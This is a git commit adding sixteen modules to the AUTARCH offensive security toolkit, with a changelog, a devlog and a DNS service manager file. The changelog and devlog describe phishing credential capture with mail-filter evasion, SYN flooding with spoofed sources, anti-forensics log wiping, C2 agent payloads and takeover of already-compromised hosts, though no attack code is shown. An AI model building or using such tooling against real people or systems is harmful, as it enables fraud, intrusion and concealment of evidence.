v2.2.0 — Full arsenal expansion: 16 new security modules
Add WiFi Audit, API Fuzzer, Cloud Scanner, Threat Intel, Log Correlator, Steganography, Anti-Forensics, BLE Scanner, Forensics, RFID/NFC, Malware Sandbox, Password Toolkit, Web Scanner, Report Engine, Net Mapper, and C2 Framework. Each module includes CLI interface, Flask routes, and web UI template. Also includes Go DNS server source + binary, IP Capture service, SYN Flood, Gone Fishing mail server, and hack hijack modules from v2.0 work. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
parent
e7f68031f2
commit
2322f69516
5
.gitignore
vendored
5
.gitignore
vendored
@ -59,7 +59,9 @@ android/
|
||||
dist/
|
||||
build/
|
||||
build_temp/
|
||||
release/
|
||||
*.spec.bak
|
||||
*.zip
|
||||
|
||||
# Local utility scripts
|
||||
kill_autarch.bat
|
||||
@ -71,6 +73,9 @@ Thumbs.db
|
||||
# Claude Code
|
||||
.claude/
|
||||
|
||||
# Development planning docs
|
||||
phase2.md
|
||||
|
||||
# Snoop data
|
||||
snoop/
|
||||
data/sites/snoop_full.json
|
||||
|
||||
187
CHANGELOG.md
Normal file
187
CHANGELOG.md
Normal file
@ -0,0 +1,187 @@
|
||||
# AUTARCH Changelog
|
||||
|
||||
---
|
||||
|
||||
## v2.2.0 — 2026-03-03
|
||||
|
||||
### Full Arsenal Expansion — 16 New Modules
|
||||
|
||||
Phase 2 complete. 16 new security modules with full CLI, Flask routes, and web UI templates.
|
||||
|
||||
#### Offense
|
||||
- **WiFi Auditing** (`/wifi/`) — aircrack-ng integration: monitor mode, AP scanning, deauth attacks, WPA handshake capture/crack, WPS Pixie-Dust, rogue AP detection, packet capture
|
||||
- **API Fuzzer** (`/api-fuzzer/`) — OpenAPI/Swagger discovery, parameter fuzzing (SQLi/XSS/traversal/type confusion), auth bypass & IDOR testing, rate limit probing, GraphQL introspection attacks
|
||||
- **Cloud Security Scanner** (`/cloud/`) — S3/GCS/Azure blob enumeration, exposed service scanning, IMDS metadata SSRF checks, cloud subdomain enumeration
|
||||
- **C2 Framework** (`/c2/`) — multi-session agent management, Python/PowerShell/Bash payloads, HTTP/HTTPS/DNS beaconing, file transfer, SOCKS pivoting, listener management
|
||||
- **Web Application Scanner** (`/webscan/`) — directory bruteforce, subdomain enum, SQLi/XSS detection, header analysis, tech fingerprinting, SSL/TLS audit, crawler
|
||||
|
||||
#### Defense
|
||||
- **Threat Intel Feed** (`/threat-intel/`) — IOC management (IP/domain/hash/URL), STIX/CSV/JSON feed ingestion, VirusTotal & AbuseIPDB API lookups, network correlation, blocklist export (iptables/nginx/snort)
|
||||
- **Log Correlator** (`/logs/`) — multi-format log parsing (syslog/Apache/JSON), 10 built-in detection rules (SSH brute force, SQLi, XSS, path traversal), threshold alerting, custom rules, timeline view
|
||||
|
||||
#### Counter
|
||||
- **Steganography** (`/stego/`) — LSB image encoding (PNG/BMP), audio steganography (WAV), document whitespace encoding (zero-width chars), AES-256 pre-encryption, chi-square & RS statistical detection
|
||||
- **Anti-Forensics** (`/anti-forensics/`) — multi-pass secure file/directory deletion, free space wiping, timestamp manipulation (set/clone/randomize), log clearing, shell history scrubbing, EXIF & PDF metadata stripping
|
||||
|
||||
#### Analyze
|
||||
- **Password Toolkit** (`/passwords/`) — hash identification & cracking (hashcat/john integration), secure password generation, credential spray testing (SSH/FTP/SMB/HTTP), wordlist management, policy auditing
|
||||
- **Network Topology Mapper** (`/netmap/`) — ARP/ICMP/TCP host discovery, service enumeration, OS fingerprinting, SVG topology visualization, subnet grouping, scan diffing
|
||||
- **Reporting Engine** (`/reports/`) — structured pentest reports, CVSS-scored findings, auto-population from scans & dossiers, PDF/HTML/Markdown export, compliance mapping (OWASP/NIST/CIS)
|
||||
- **BLE Scanner** (`/ble/`) — BLE advertisement scanning via bleak, service & characteristic enumeration, read/write operations, known vulnerability database, RSSI proximity tracking
|
||||
- **Forensics Toolkit** (`/forensics/`) — disk imaging (dd + hash verification), file carving by magic bytes (15 types), EXIF metadata extraction, filesystem timeline builder, chain of custody logging
|
||||
- **RFID/NFC Tools** (`/rfid/`) — Proxmark3 integration (LF/HF search, EM410x read/clone/sim, MIFARE dump/clone), libnfc NFC scanning, card database, default MIFARE keys
|
||||
- **Malware Sandbox** (`/sandbox/`) — sample submission (file upload or path), static analysis (strings, PE/ELF parsing, YARA-like indicators, risk scoring), Docker-based dynamic analysis with behavior logging
|
||||
|
||||
### Build System
|
||||
- All 16 modules wired into `web/app.py` (blueprint registration), `base.html` (sidebar navigation), `autarch_public.spec` and `setup_msi.py` (hidden imports)
|
||||
- Sidebar organized by category: Defense, Offense, Counter, Analyze
|
||||
|
||||
---
|
||||
|
||||
## v2.1.0 — 2026-03-03
|
||||
|
||||
### DNS-over-TLS (DoT) & DNS-over-HTTPS (DoH)
|
||||
|
||||
- **Full DoT implementation** — encrypted DNS queries over TLS (port 853) with certificate validation
|
||||
- **Full DoH implementation** — encrypted DNS queries over HTTPS (RFC 8484, wire-format POST)
|
||||
- **Auto-detection** for known encrypted providers:
|
||||
- Google DNS (`8.8.8.8`, `8.8.4.4`) — DoT via `dns.google`, DoH via `https://dns.google/dns-query`
|
||||
- Cloudflare (`1.1.1.1`, `1.0.0.1`) — DoT via `one.one.one.one`, DoH via `https://cloudflare-dns.com/dns-query`
|
||||
- Quad9 (`9.9.9.9`, `149.112.112.112`) — DoT via `dns.quad9.net`, DoH via `https://dns.quad9.net/dns-query`
|
||||
- OpenDNS (`208.67.222.222`, `208.67.220.220`) — DoT/DoH via `dns.opendns.com`
|
||||
- AdGuard (`94.140.14.14`, `94.140.15.15`) — DoT/DoH via `dns.adguard-dns.com`
|
||||
- **Priority chain**: DoH > DoT > Plain DNS — auto-fallback on failure
|
||||
- **Encryption test tool** in the Nameserver UI — live test DoT/DoH/Plain against any server with latency reporting
|
||||
- **Toggle controls** — enable/disable DoT and DoH independently via UI or API
|
||||
- **API endpoints**: `GET/POST /api/encryption`, `POST /api/encryption/test`
|
||||
|
||||
### Hosts File Support
|
||||
|
||||
- **Hosts-file parser** — `/etc/hosts` style hostname resolution served via DNS
|
||||
- **Resolution priority**: Hosts file entries checked before zones and cache for fastest local resolution
|
||||
- **CRUD operations** — add, remove, search individual host entries via UI or API
|
||||
- **Bulk import** — paste hosts-file format text or load from a file path (e.g., `/etc/hosts`, `C:\Windows\System32\drivers\etc\hosts`)
|
||||
- **System hosts loader** — one-click button to load the OS hosts file
|
||||
- **Export** — download current hosts database in standard hosts-file format
|
||||
- **PTR reverse lookup** — hosts entries support reverse DNS (in-addr.arpa) queries
|
||||
- **Alias support** — multiple hostnames per IP, matching on primary hostname or any alias
|
||||
- **Hosts tab** in Nameserver UI — full management table with search, inline add, import/export
|
||||
- **API endpoints**: `GET/POST/DELETE /api/hosts`, `POST /api/hosts/import`, `GET /api/hosts/export`
|
||||
|
||||
### EZ Intranet Domain (One-Click Local DNS)
|
||||
|
||||
- **One-click intranet domain creation** in the Nameserver UI
|
||||
- **Auto network detection** — discovers local IP, hostname, gateway, subnet via socket/ARP
|
||||
- **Host discovery** — scans ARP table for all devices on the network with reverse DNS lookup
|
||||
- **Editable DNS names** — auto-suggests names for discovered hosts, fully editable before deployment
|
||||
- **Custom hosts** — add arbitrary hosts not found by network scan
|
||||
- **Deployment creates**:
|
||||
- Forward DNS zone with SOA + NS records
|
||||
- A records for server, hostname, and all selected/custom hosts
|
||||
- Hosts-file entries for instant resolution
|
||||
- Reverse DNS zone (PTR records) for reverse lookups
|
||||
- **Client configuration** — shows copy-paste instructions for Windows (`netsh`) and Linux (`resolv.conf`/`systemd-resolved`)
|
||||
- **Router DHCP hint** — advises setting the DNS server IP in router DHCP for automatic network-wide deployment
|
||||
- **API endpoint**: `POST /dns/ez-intranet`
|
||||
|
||||
### Full Configuration UI
|
||||
|
||||
Expanded the Config tab from 5 fields to 18 fields across 5 categories:
|
||||
|
||||
- **Network** — DNS listen address, API listen address, upstream forwarder servers
|
||||
- **Cache & Performance** — cache TTL, negative cache TTL (NXDOMAIN), SERVFAIL cache TTL, query log max entries, max UDP response size, rate limit (queries/sec/IP), prefetch toggle
|
||||
- **Security** — query logging, refuse ANY queries (anti-amplification), minimal responses (hide server info), zone transfer ACL (AXFR/IXFR whitelist)
|
||||
- **Encryption** — DoH enable/disable, DoT enable/disable with priority explanation
|
||||
- **Hosts** — hosts file path, auto-load on startup toggle
|
||||
|
||||
All settings are live-editable from the dashboard and propagated to the running server without restart.
|
||||
|
||||
### Go DNS Server Changes
|
||||
|
||||
- **`server/resolver.go`** — added `QueryUpstreamDoT()`, `QueryUpstreamDoH()`, `queryUpstreamEncrypted()`, `GetEncryptionStatus()` with TLS 1.2+ minimum, HTTP/2 for DoH, proper SNI for DoT
|
||||
- **`server/hosts.go`** — new file: `HostsStore` with `LoadFile()`, `LoadFromText()`, `Add()`, `Remove()`, `Lookup()`, `Export()`, PTR support
|
||||
- **`server/dns.go`** — integrated hosts lookup before zone lookup in query handler; added `GetHosts()`, `GetEncryptionStatus()`, `SetEncryption()`, `GetResolver()`
|
||||
- **`config/config.go`** — added `HostsFile`, `HostsAutoLoad`, `QueryLogMax`, `NegativeCacheTTL`, `PrefetchEnabled`, `ServFailCacheTTL`
|
||||
- **`api/router.go`** — added 5 new endpoint groups: hosts CRUD, hosts import/export, encryption status/toggle, encryption test, full config expansion
|
||||
- **`main.go`** — version bump to 2.1.0
|
||||
|
||||
### Web Dashboard Changes
|
||||
|
||||
- **`web/templates/dns_nameserver.html`** — added 3 new tabs: Encryption, Hosts, EZ Intranet (13 tabs total)
|
||||
- **`web/templates/dns_service.html`** — expanded Config tab with all 18 settings in categorized layout
|
||||
- **`web/routes/dns_service.py`** — added 8 new routes: hosts CRUD, hosts import/export, encryption status/toggle/test, EZ intranet deploy
|
||||
|
||||
---
|
||||
|
||||
## v2.0.0 — 2026-03-03
|
||||
|
||||
### Go DNS/Nameserver Service
|
||||
|
||||
- **Full recursive DNS resolver** from IANA root hints — no upstream dependency
|
||||
- **13 root server** iterative resolution with delegation chain following
|
||||
- **CNAME chain following** across zone boundaries
|
||||
- **Authoritative zone hosting** with JSON-backed zone storage
|
||||
- **Record types**: A, AAAA, CNAME, MX, TXT, NS, SRV, PTR, SOA
|
||||
- **DNSSEC toggle** per zone
|
||||
- **DNS caching** with configurable TTL and automatic cleanup
|
||||
- **Query logging** with ring buffer (configurable size)
|
||||
- **Analytics**: top domains, query type distribution, per-client query counts
|
||||
- **Blocklist**: exact match + wildcard parent domain matching, bulk import (hosts-file format)
|
||||
- **Conditional forwarding**: zone-specific upstream server rules
|
||||
- **Root health check**: concurrent ping of all 13 IANA root servers with latency measurement
|
||||
- **Benchmark tool**: multi-domain latency testing with min/avg/max statistics
|
||||
- **Zone import/export**: BIND zone file format support
|
||||
- **Zone cloning**: duplicate zone with all records
|
||||
- **Bulk record operations**: add multiple records in a single request
|
||||
- **Mail record auto-setup**: one-click MX + SPF + DKIM + DMARC creation
|
||||
- **Security hardening**: refuse ANY (anti-amplification), minimal responses, AXFR/IXFR blocking, rate limiting, max UDP size (1232 bytes for safe MTU)
|
||||
- **REST API**: 30+ endpoints with token auth and CORS
|
||||
|
||||
### Nameserver Web UI (10 tabs)
|
||||
|
||||
- **Query** — DNS query tester against local NS or system resolver
|
||||
- **Query Log** — auto-refreshing query history with filtering
|
||||
- **Analytics** — top domains (bar charts), query type distribution, client stats, NS cache viewer
|
||||
- **Cache** — searchable cache viewer with per-entry and full flush
|
||||
- **Blocklist** — add/remove/search domains, bulk import in hosts-file format
|
||||
- **Forwarding** — conditional forwarding rule management
|
||||
- **Root Health** — concurrent check of all 13 root servers with latency bars
|
||||
- **Benchmark** — multi-domain latency testing with visual results
|
||||
- **Delegation** — NS delegation record generator with glue record instructions
|
||||
- **Build** — Go binary compilation controls and instructions
|
||||
|
||||
### DNS Zone Manager Web UI (7 tabs)
|
||||
|
||||
- **Zones** — create/delete/clone zones
|
||||
- **Records** — full CRUD with bulk add (JSON), filtering by type/search, column sorting
|
||||
- **EZ-Local** — network auto-scan intranet domain setup with ARP host discovery
|
||||
- **Reverse Proxy** — DDNS, nginx/Caddy/Apache config generation, UPnP port forwarding
|
||||
- **Import/Export** — BIND zone file backup/restore with inline editor
|
||||
- **Templates** — quick-setup for web server, mail server, PTR, subdomain delegation
|
||||
- **Config** — full server configuration panel
|
||||
|
||||
### Gone Fishing Mail Server Enhancements
|
||||
|
||||
- **Landing pages** — 4 built-in phishing templates (Office 365, Google, Generic, VPN) + custom HTML editor
|
||||
- **Credential capture** — form POST interception on unauthenticated endpoints with IP/UA/referer logging
|
||||
- **DKIM signing** — OpenSSL RSA 2048-bit keypair generation and DNS record instructions
|
||||
- **DNS auto-setup** — automatic MX/SPF/DKIM/DMARC record creation via DNS service integration
|
||||
- **Email evasion** — Unicode homoglyphs (30% swap), zero-width character insertion (15%), HTML entity encoding (20%)
|
||||
- **Header manipulation** — random X-Mailer, X-Priority, custom headers, spoofed Received chain generation
|
||||
- **CSV import/export** — bulk target import and credential capture export
|
||||
- **Campaign management** — per-campaign tracking, export, and capture association
|
||||
|
||||
### IP Capture & Redirect Service
|
||||
|
||||
- **Stealthy link tracking** — fast 302 redirect with IP/UA/headers capture
|
||||
- **Realistic URL disguise** — article-style paths that look like real news URLs
|
||||
- **GeoIP lookup** on captured IPs
|
||||
- **Dossier integration** — add captures to existing OSINT dossiers
|
||||
- **Management UI** — create/manage links, view captures with filtering, export
|
||||
|
||||
### SYN Flood Module
|
||||
|
||||
- **TCP SYN flood** attack tool with configurable parameters
|
||||
- **Multi-threaded** packet generation
|
||||
- **Port targeting** — single port, range, or random
|
||||
- **Source IP spoofing** options
|
||||
130
DEVLOG.md
130
DEVLOG.md
@ -5610,3 +5610,133 @@ Wired Hal chat to the Agent system so it can create new AUTARCH modules on deman
|
||||
|
||||
---
|
||||
|
||||
## Phase 5 — Arsenal Expansion (2026-03-03)
|
||||
|
||||
Major expansion adding 11 new modules across all categories: DNS service, IP capture, phishing mail, load testing, hack hijack, password toolkit, web app scanner, reporting engine, network topology mapper, and C2 framework.
|
||||
|
||||
### Phase 5.0 — Go DNS/Nameserver Service
|
||||
|
||||
**Problem:** No built-in DNS/nameserver capability. Phishing, C2, and OSINT operations all benefit from authoritative DNS control but required external tools.
|
||||
|
||||
**Fix:** Built a standalone Go DNS server (`services/dns-server/`) with full zone management, record CRUD, DNSSEC signing, and upstream recursive resolution. Python management layer wraps the Go binary via HTTP REST API. Web dashboard provides zone editor, record management, DNSSEC toggle, and live metrics.
|
||||
|
||||
**Files Changed:**
|
||||
- `services/dns-server/` (NEW) — Go DNS server: `main.go`, `server/dns.go`, `server/zones.go`, `server/dnssec.go`, `server/resolver.go`, `api/router.go`, `api/zones.go`, `api/status.go`, `api/middleware.go`, `config/config.go`, `build.sh`
|
||||
- `core/dns_service.py` (NEW) — `DNSServiceManager` singleton: binary discovery, process lifecycle, REST API proxy, zone/record CRUD, mail record setup, DNSSEC management, metrics
|
||||
- `web/routes/dns_service.py` (NEW) — Blueprint `dns_service_bp`, 15+ endpoints proxying to Go API
|
||||
- `web/templates/dns_service.html` (NEW) — Zone manager, record editor, DNSSEC panel, metrics dashboard
|
||||
- `autarch_settings.conf` — Added `[dns]` section (enabled, listen, api_port, upstream, auto_start)
|
||||
|
||||
### Phase 5.1 — IP Capture Redirect Service
|
||||
|
||||
**Problem:** No way to track who clicks a link and capture their IP/metadata for OSINT operations.
|
||||
|
||||
**Fix:** Created stealthy IP capture service with fast 302 redirects, realistic disguised URLs (looks like real article paths), full header capture (IP, User-Agent, Accept-Language, Referer, timezone), GeoIP lookup, and dossier integration. Capture endpoints are unauthenticated for stealth; management UI is behind login.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/ipcapture.py` (NEW, ~350 lines) — `IPCaptureService` class: link creation with disguise types, capture recording with full header extraction, GeoIP lookup, dossier integration, CSV/JSON export. CLI `run()` with 5 menu options.
|
||||
- `web/routes/ipcapture.py` (NEW, ~120 lines) — Blueprint `ipcapture_bp`: link CRUD, capture viewer, export, unauthenticated capture endpoints (`/c/<key>`, `/article/<path>`)
|
||||
- `web/templates/ipcapture.html` (NEW, ~300 lines) — 2 tabs: Create & Manage (link form, active links table, copy-to-clipboard, QR codes), Captures (per-link log with IP/geo/timestamp/UA, map, export, "Add to Dossier")
|
||||
|
||||
### Phase 5.2 — Gone Fishing Mail Service
|
||||
|
||||
**Problem:** No built-in phishing email capability for authorized penetration testing engagements.
|
||||
|
||||
**Fix:** Full SMTP phishing mail service with HTML template editor, attachment support, sender spoofing, DKIM signing, self-signed TLS cert generation, campaign tracking, and DNS service integration for auto-creating MX/SPF/DKIM/DMARC records.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/phishmail.py` (NEW) — `PhishMailService` class: SMTP sending with spoofed headers, HTML templates, DKIM signing, TLS cert generation, campaign management, DNS auto-setup
|
||||
- `web/routes/phishmail.py` (NEW) — Blueprint `phishmail_bp`: compose, send, templates, campaigns, DNS integration
|
||||
- `web/templates/phishmail.html` (NEW) — 4 tabs: Compose (WYSIWYG-like), Templates, Campaigns, Server & Certs (DNS integration section)
|
||||
|
||||
### Phase 5.3 — SYN Flood / Load Testing
|
||||
|
||||
**Problem:** No built-in network stress testing / DDoS simulation for authorized testing.
|
||||
|
||||
**Fix:** Created load testing module with SYN flood (raw sockets), HTTP flood (GET/POST), UDP flood, and Slowloris attack modes. Configurable threads, duration, packet size. Real-time stats via SSE.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/loadtest.py` (NEW) — `LoadTestService` class: SYN/HTTP/UDP/Slowloris flood modes, threaded execution, real-time statistics, bandwidth calculation
|
||||
- `web/routes/loadtest.py` (NEW) — Blueprint `loadtest_bp`: start/stop/status endpoints, SSE stats stream
|
||||
- `web/templates/loadtest.html` (NEW) — Attack mode selector, target config, live stats dashboard with packets/sec and bandwidth graphs
|
||||
|
||||
### Phase 5.4 — Hack Hijack
|
||||
|
||||
**Problem:** No way to scan for and take over already-compromised systems — devices with existing backdoors, RAT listeners, web shells, bind shells, or crypto miners.
|
||||
|
||||
**Fix:** Created offense module with 25+ backdoor signatures covering EternalBlue/DoublePulsar, major RATs (Meterpreter, Cobalt Strike, njRAT, DarkComet, Quasar, AsyncRAT, Gh0st, Poison Ivy), shell backdoors, web shells (20+ common paths probed), SOCKS/HTTP proxies, and crypto miners. DoublePulsar detection uses SMB Trans2 SESSION_SETUP probe with MID manipulation analysis. Threaded scanning with configurable concurrency.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/hack_hijack.py` (NEW, ~580 lines) — `HackHijackService` class: `scan_target()` (threaded port scan + signature matching), `_check_doublepulsar()` (SMB Trans2 probe), `_check_smb()` (nmap MS17-010), `connect_raw_shell()`, `shell_execute()`, `attempt_takeover()`, `_detect_webshell()`. 25+ `BackdoorSignature` dataclasses. Singleton `get_hack_hijack()`. CLI `run()` with 5 options.
|
||||
- `web/routes/hack_hijack.py` (NEW, ~100 lines) — Blueprint `hack_hijack_bp`: scan (POST + poll), takeover, sessions CRUD, shell exec, history
|
||||
- `web/templates/hack_hijack.html` (NEW, ~250 lines) — 4 tabs: Scan Target, Results (color-coded confidence + category badges), Sessions (interactive shell terminal), History
|
||||
|
||||
### Phase 5.5 — Password Toolkit
|
||||
|
||||
**Problem:** No built-in hash analysis or password cracking capability.
|
||||
|
||||
**Fix:** Created analyze module with 22 hash type signatures (MD5 through bcrypt/scrypt/Argon2), hashcat/John integration via subprocess with Python fallback for common hashes, configurable password generator with pattern syntax (`?u`/`?l`/`?d`/`?s`/`?a`), entropy-based password auditing, and credential spray testing against SSH/FTP/SMB services.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/password_toolkit.py` (NEW, ~480 lines) — `PasswordToolkit` class: `identify_hash()` (22 regex signatures with hashcat mode + john format), `crack_hash()` (hashcat → john → python fallback), `generate_password()` (charset + pattern), `audit_password()` (entropy + policy), `credential_spray()` (SSH/FTP/SMB), `list_wordlists()`, `hash_string()`. Singleton `get_password_toolkit()`.
|
||||
- `web/routes/password_toolkit.py` (NEW, ~120 lines) — Blueprint `password_toolkit_bp`, 12 endpoints
|
||||
- `web/templates/password_toolkit.html` (NEW, ~250 lines) — 5 tabs: Identify, Crack, Generate, Spray, Wordlists. Live password audit with animated strength bar.
|
||||
|
||||
### Phase 5.6 — Web Application Scanner
|
||||
|
||||
**Problem:** No built-in web vulnerability scanner for authorized penetration testing.
|
||||
|
||||
**Fix:** Created offense module with directory bruteforce (threaded, ~60 built-in paths + custom wordlists), subdomain enumeration (crt.sh CT logs + DNS brute), technology fingerprinting (17 signatures: WordPress, Drupal, Laravel, Django, React, Angular, etc.), security header analysis (10 checks), SSL/TLS audit, SQLi detection (error-based signatures), XSS detection (reflected payloads), and site crawling with depth control.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/webapp_scanner.py` (NEW, ~500 lines) — `WebAppScanner` class: `quick_scan()` (headers + tech + SSL), `dir_bruteforce()` (threaded), `subdomain_enum()` (CT logs + DNS brute), `vuln_scan()` (SQLi + XSS), `crawl()` (spider with depth), `_check_ssl()`, `_fingerprint_tech()`. 17 `TECH_SIGNATURES`, 10 `SECURITY_HEADERS`, `SQLI_PAYLOADS`, `XSS_PAYLOADS`, `SQL_ERRORS`.
|
||||
- `web/routes/webapp_scanner.py` (NEW, ~60 lines) — Blueprint `webapp_scanner_bp`, 6 endpoints
|
||||
- `web/templates/webapp_scanner.html` (NEW, ~200 lines) — 5 tabs: Quick Scan, Dir Brute, Subdomains, Vuln Scan, Crawl
|
||||
|
||||
### Phase 5.7 — Reporting Engine
|
||||
|
||||
**Problem:** No structured way to compile pentest findings into professional reports.
|
||||
|
||||
**Fix:** Created analyze module with structured report builder (executive summary, scope, methodology, findings, recommendations), 10 pre-built finding templates with CVSS scores mapped to OWASP Top 10 (SQLi 9.8, XSS 7.5, Broken Auth 9.1, IDOR 7.5, Missing Headers 3.1, etc.), and export to HTML (styled with severity summary), Markdown, and JSON formats. JSON file persistence per report in `data/reports/`.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/report_engine.py` (NEW, ~380 lines) — `ReportEngine` class: `create_report()`, `add_finding()`, `update_finding()`, `export_html()` (styled HTML with severity breakdown), `export_markdown()`, `export_json()`. 10 `FINDING_TEMPLATES` with CVSS scores. Singleton `get_report_engine()`.
|
||||
- `web/routes/report_engine.py` (NEW, ~90 lines) — Blueprint `report_engine_bp`, 11 endpoints
|
||||
- `web/templates/report_engine.html` (NEW, ~220 lines) — 3 tabs: Reports (list + create), Editor (severity summary + findings + export), Templates (pre-built finding types)
|
||||
|
||||
### Phase 5.8 — Network Topology Mapper
|
||||
|
||||
**Problem:** No visual network mapping capability beyond raw nmap output.
|
||||
|
||||
**Fix:** Created analyze module with host discovery (nmap or ICMP/TCP ping sweep, 100 concurrent threads), service enumeration with OS fingerprinting, SVG topology visualization with force-directed layout, auto-grouping by subnet, scan persistence with diff comparison (new/removed/unchanged hosts over time), and CIDR expansion via `struct.unpack`/`socket.inet_aton`.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/net_mapper.py` (NEW, ~400 lines) — `NetMapper` class: `discover_hosts()` (nmap/ping sweep), `scan_host()` (nmap or socket fallback), `build_topology()` (nodes + edges graph), `save_scan()`, `load_scan()`, `diff_scans()`. `Host` dataclass. Singleton `get_net_mapper()`.
|
||||
- `web/routes/net_mapper.py` (NEW, ~70 lines) — Blueprint `net_mapper_bp`, 8 endpoints (discover + poll, scan-host, topology, scans CRUD, diff)
|
||||
- `web/templates/net_mapper.html` (NEW, ~200 lines) — 3 tabs: Discover (host table with detail scan), Map (SVG topology with color-coded node types), Saved Scans (list + diff comparison)
|
||||
|
||||
### Phase 5.9 — C2 Framework
|
||||
|
||||
**Problem:** Reverse shell listener existed but no multi-agent command & control infrastructure.
|
||||
|
||||
**Fix:** Created offense module with multi-listener TCP server, multi-agent management, task queue architecture, and agent templates for Python/Bash/PowerShell with configurable beacon interval and jitter. Agents support: register, exec, download, upload, sysinfo commands. Communication via HTTP beaconing or raw TCP. Web UI provides agent dashboard with auto-refresh, interactive shell, and payload generator with one-liners.
|
||||
|
||||
**Files Changed:**
|
||||
- `modules/c2_framework.py` (NEW, ~500 lines) — `C2Server` class: `start_listener()` (TCP accept loop), `_handle_agent()` (registration + task dispatch), `queue_task()`, `execute_command()`, `download_file()`, `upload_file()`, `generate_agent()`, `get_oneliner()`. `PYTHON_AGENT_TEMPLATE`, `BASH_AGENT_TEMPLATE`, `POWERSHELL_AGENT_TEMPLATE`. Singleton `get_c2_server()`.
|
||||
- `web/routes/c2_framework.py` (NEW, ~100 lines) — Blueprint `c2_framework_bp`, 12 endpoints (listeners, agents, tasks, generate, oneliner)
|
||||
- `web/templates/c2_framework.html` (NEW, ~220 lines) — 3 tabs: Dashboard (listeners + agents + task queue with 10s auto-refresh), Agents (interactive shell terminal), Generate (agent payloads + one-liners with copy-to-clipboard)
|
||||
|
||||
### Phase 5.10 — Wiring & Build Config
|
||||
|
||||
**Problem:** All new modules needed to be wired into the Flask app, sidebar navigation, and build configs.
|
||||
|
||||
**Fix:** Registered all 11 new blueprints in `web/app.py`, added sidebar links under appropriate categories in `base.html`, and added all modules to hidden imports in both `autarch_public.spec` (PyInstaller) and `setup_msi.py` (cx_Freeze).
|
||||
|
||||
**Files Changed:**
|
||||
- `web/app.py` — Added imports + `register_blueprint()` for: `llm_trainer_bp`, `autonomy_bp`, `loadtest_bp`, `phishmail_bp`, `dns_service_bp`, `ipcapture_bp`, `hack_hijack_bp`, `password_toolkit_bp`, `webapp_scanner_bp`, `report_engine_bp`, `net_mapper_bp`, `c2_framework_bp`
|
||||
- `web/templates/base.html` — Sidebar additions: Defense: `└ Defender Monitor`; Offense: `└ Load Test`, `└ Gone Fishing`, `└ Hack Hijack`, `└ Web Scanner`, `└ C2 Framework`; Analyze: `└ Hash Toolkit`, `└ LLM Trainer`, `└ Password Toolkit`, `└ Net Mapper`, `└ Reports`; OSINT: `└ IP Capture`; System: `└ DNS Server`
|
||||
- `autarch_public.spec` — Added 12 new entries to `hiddenimports`
|
||||
- `setup_msi.py` — Added 12 new entries to `includes`
|
||||
|
||||
---
|
||||
|
||||
|
||||
@ -89,6 +89,48 @@ hidden_imports = [
|
||||
'web.routes.encmodules',
|
||||
'web.routes.llm_trainer',
|
||||
'web.routes.autonomy',
|
||||
'web.routes.loadtest',
|
||||
'web.routes.phishmail',
|
||||
'web.routes.dns_service',
|
||||
'web.routes.ipcapture',
|
||||
'web.routes.hack_hijack',
|
||||
'web.routes.password_toolkit',
|
||||
'web.routes.webapp_scanner',
|
||||
'web.routes.report_engine',
|
||||
'web.routes.net_mapper',
|
||||
'web.routes.c2_framework',
|
||||
'web.routes.wifi_audit',
|
||||
'web.routes.threat_intel',
|
||||
'web.routes.steganography',
|
||||
'web.routes.api_fuzzer',
|
||||
'web.routes.ble_scanner',
|
||||
'web.routes.forensics',
|
||||
'web.routes.rfid_tools',
|
||||
'web.routes.cloud_scan',
|
||||
'web.routes.malware_sandbox',
|
||||
'web.routes.log_correlator',
|
||||
'web.routes.anti_forensics',
|
||||
'modules.loadtest',
|
||||
'modules.phishmail',
|
||||
'modules.ipcapture',
|
||||
'modules.hack_hijack',
|
||||
'modules.password_toolkit',
|
||||
'modules.webapp_scanner',
|
||||
'modules.report_engine',
|
||||
'modules.net_mapper',
|
||||
'modules.c2_framework',
|
||||
'modules.wifi_audit',
|
||||
'modules.threat_intel',
|
||||
'modules.steganography',
|
||||
'modules.api_fuzzer',
|
||||
'modules.ble_scanner',
|
||||
'modules.forensics',
|
||||
'modules.rfid_tools',
|
||||
'modules.cloud_scan',
|
||||
'modules.malware_sandbox',
|
||||
'modules.log_correlator',
|
||||
'modules.anti_forensics',
|
||||
'core.dns_service',
|
||||
|
||||
# Standard library (sometimes missed on Windows)
|
||||
'email.mime.text', 'email.mime.multipart',
|
||||
|
||||
324
core/dns_service.py
Normal file
324
core/dns_service.py
Normal file
@ -0,0 +1,324 @@
|
||||
"""AUTARCH DNS Service Manager — controls the Go-based autarch-dns binary."""
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import time
|
||||
import signal
|
||||
import socket
|
||||
import subprocess
|
||||
import threading
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
import shutil
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
import requests
|
||||
_HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
_HAS_REQUESTS = False
|
||||
|
||||
|
||||
class DNSServiceManager:
|
||||
"""Manage the autarch-dns Go binary (start/stop/API calls)."""
|
||||
|
||||
def __init__(self):
|
||||
self._process = None
|
||||
self._pid = None
|
||||
self._config = None
|
||||
self._config_path = os.path.join(get_data_dir(), 'dns', 'config.json')
|
||||
self._load_config()
|
||||
|
||||
def _load_config(self):
|
||||
if os.path.exists(self._config_path):
|
||||
try:
|
||||
with open(self._config_path, 'r') as f:
|
||||
self._config = json.load(f)
|
||||
except Exception:
|
||||
self._config = None
|
||||
if not self._config:
|
||||
self._config = {
|
||||
'listen_dns': '0.0.0.0:53',
|
||||
'listen_api': '127.0.0.1:5380',
|
||||
'api_token': os.urandom(16).hex(),
|
||||
'upstream': [], # Empty = pure recursive from root hints
|
||||
'cache_ttl': 300,
|
||||
'zones_dir': os.path.join(get_data_dir(), 'dns', 'zones'),
|
||||
'dnssec_keys_dir': os.path.join(get_data_dir(), 'dns', 'keys'),
|
||||
'log_queries': True,
|
